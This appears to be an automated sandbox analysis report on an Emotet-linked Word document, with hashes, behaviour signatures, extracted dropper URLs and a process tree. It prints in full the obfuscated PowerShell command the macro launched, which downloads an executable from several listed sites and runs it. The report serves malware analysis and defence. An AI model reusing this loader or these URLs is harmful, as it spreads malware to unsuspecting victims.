Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 20:45

General

  • Target

    26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5.doc

  • Size

    203KB

  • MD5

    3f27a3e06a8dbeb16ecf0dde173d1924

  • SHA1

    a1a679288523857f1d304a7d4ce08f2c3cfc9a37

  • SHA256

    26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5

  • SHA512

    923b28f1acf8cac626f683bc98e116ed304b6b8f5e4f38026d955dda3a91829a73d7fcc45c6be19908fb07dc2d173b30e6b2721d14cb58f0271aa3328f557dad

  • SSDEEP

    6144:P8AO4pC8pN7tpTBOI+VHSfXTWMfHaR5f:0AO16ZPTWM/aR

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://krems-bedachungen.de/fyKDV/

exe.dropper

http://4glory.net/btKzNVlg/

exe.dropper

http://angelabphotography.com/4hR1e/

exe.dropper

http://dekormc.pl/js/ncrILdi/

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\26de80e3bbbe1f053da4131ca7a405644b7443356ec97d48517f1ab86d5f1ca5.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3008
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell (('(Jxu3Jxu+JxuhJxu+JxuRnsJxu+JxuaJxu'+'+JxudJxu+Jxuasd = &(efpnefp+efpJx'+'u+Jxueefp+'+'efJxu+JxupJxu+Jxuw-objeceJxu+'+'JxufJxu+JxupJxu+Jxu+eJxu+J'+'xufptefp) random;3Jxu+JxuhJxu+JxuRYJxu+J'+'xuYJxu+Jx'+'uU =Jxu+Jxu Jxu+Jxu.Jxu+Jxu(Jxu+JxuefpnJxu+JxueJxu+Jxue'+'fp+efJxu+JxupJxu+JxuwJxu+Jx'+'uefpJxu+Jxu+eJxu+Jxufp-objecteJxu+Jxufp) Sy'+'sJxu+Jxutem'+'.Net.WebClJxu+JxuieJxu+JxuntJx'+'u+Jxu;3Jxu+JxuhRJxu+Jx'+'uNJxu+JxuSB = 3Jxu+JxuhRJxu+JxunJxu+JxusadJxu+JxuasdJxu+J'+'xu.neJx'+'u+JxuxJxu+JxutJxu+Jxu(Jxu+Jxu10000Jxu+Jxu,Jx'+'u+Jx'+'u 28213Jxu+Jxu3)Jxu+Jxu;Jxu+Jxu3hRADJxu+Jxu'+'C'+'XJxu+Jxu Jxu+'+'Jx'+'u= '+'ef'+'p http:/Jxu+Jxu/lg'+'lab.Jxu+Jxuco.Jxu+JxuukJxu+Jxu/vsiJxu+Jxu6YDJxu+JxurX/@hJxu+JxuttJxu+Jxup://Jxu+JxukJxu+JxureJxu'+'+JxumJxu+'+'JxusJxu+Jxu-beJxu+JxudaJxu+JxuchungenJxu+Jxu.Jxu+JxudeJxu+Jx'+'u/Jxu+JxufyKDVJxu+Jxu/Jxu+Jxu@http:Jxu+Jx'+'u//4glorJxu+Jxuy.net/bJxu+J'+'xutKzJxu+JxuNVlg/@Jxu+JxuhttpJxu+Jx'+'u://aJxu+JxungelJxu+JxuabphotogJxu+Jxuraph'+'y.Jxu+JxucJxu+JxuomJxu+Jxu/Jxu+Jxu4hJxu+Jxu'+'R1eJxu+Jxu/@htJxu'+'+JxutJxu+Jxup:Jxu+Jxu//dekormJxu+Jxuc.Jxu+JxupJxu+JxulJxu+Jxu/J'+'xu+Jxujs/Jxu+JxuncrJxu+JxuILdiJxu+Jxu/eJxu+Jxufp.SJxu+JxupJxu+Jxulit(efpJxu+Jx'+'u@eJxu+Jxufp);Jxu+Jxu3hRSDC = 3Jxu+JxuhRenvJxu'+'+Jxu:publiJxu+JxucJ'+'xu+Jxu + efJxu+'+'Jxup7FMJxu+J'+'xuefpJxu+Jxu + Jxu+Jxu3hRN'+'SB Jxu+Jxu+Jxu+Jxu'+' (Jxu+JxuefpJxu+Jxu.exefp+Jxu+JxueJxu+JxufJ'+'xu+JxupeJxu+JxuefJxu+Jxup);foJxu+JxurJxu+JxueacJxu+Jxuh(Jxu+Jxu3hRasfc iJxu+JxunJxu+Jxu 3hJxu+JxuRADJxu+'+'JxuCX)Jxu+Jxu{Jx'+'u+JxutJxu+Jxur'+'Jxu+Jxuy{3hRYYU.EJxu+JxuLBJxu+JxuDoJx'+'u+JxuTY0W'+'nlT'+'Y0OadFITJxu+JxuYJxu+Jxu0lJxu+JxueEJxu+JxuLJxu+JxuB(3hRasfc.E'+'LBToStJxu+JxurTJxu+JxuYJxu+Jxu0Jxu+JxuiTJxu+JxuYJxu+Jxu0NgELJxu+JxuBJxu+Jxu()Jxu+Jxu, 3Jxu+JxuhRSDC);&(efpInvJxu+JxuoefpJxu+Jxu+efpkeJxu+'+'Jxuf'+'p+efp'+'e-It'+'emeJxu+JxufpJxu+'+'Jxu)Jxu+Jxu(3hJxu+JxuRSJx'+'u+JxuDCJxu+Jxu);breakJxu+Jxu;Jxu+Jxu}catch{}Jxu+Jxu}Jxu).R'+'EpLACe(Jxu7FMJxu,JxuD2cJxu).REpLACe(JxuefpJxu,[STRinG][Char]39).REpLACe('+'Jxu3h'+'RJxu,Jxus'+'uKJxu).REpLACe(JxuELBJxu,[STRinG][Char]34).REpLACe(JxuTY0Jxu,[STRinG][Char]96) tMo. ( suKPshOme[4]+suKPSHoMe[30]+JxuxJxu)')-CreplaCE 'tMo',[cHar]124-CreplaCE 'Jxu',[cHar]39-rEPlAcE 'suK',[cHar]36 -rEPlAcE ([cHar]68+[cHar]50+[cHar]99),[cHar]92) |.( $SHELLID[1]+$sHELlID[13]+'X')
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1760

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      67e39e6e9e7d3db1a2b41c8958ad0ac8

      SHA1

      b10f6477ee0ed97b9c5d0d9b4407dd84edf85680

      SHA256

      8b7fada166862a58076f141dad2bec2c0fda0f6492af303b8349e2df1e67e24f

      SHA512

      614ace177f6d02c71a9d6be0767592b03eee7b294ab34df513a58e469f6c2b63373499940514b3adb5a6071eba6ab305045f216a2e16cb493ce9360c7d01300d

    • memory/1980-0-0x000000002F221000-0x000000002F222000-memory.dmp

      Filesize

      4KB

    • memory/1980-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1980-2-0x00000000717BD000-0x00000000717C8000-memory.dmp

      Filesize

      44KB

    • memory/1980-8-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-47-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-52-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-69-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-68-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-67-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-66-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-65-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-63-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-62-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-60-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-59-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-58-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-57-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-56-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-55-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-54-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-53-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-50-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-51-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-49-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-48-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-46-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-45-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-44-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-43-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-42-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-41-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-40-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-39-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-38-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-37-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-35-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-34-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-33-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-32-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-31-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-30-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-28-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-29-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-27-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-26-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-25-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-24-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-23-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-22-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-64-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-61-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-21-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-164-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-20-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-19-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-18-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-17-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-16-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-15-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-14-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-13-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-12-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-11-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-10-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-9-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-7-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-6-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-5-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-4-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-174-0x00000000717BD000-0x00000000717C8000-memory.dmp

      Filesize

      44KB

    • memory/1980-175-0x00000000001E0000-0x00000000002E0000-memory.dmp

      Filesize

      1024KB

    • memory/1980-192-0x00000000717BD000-0x00000000717C8000-memory.dmp

      Filesize

      44KB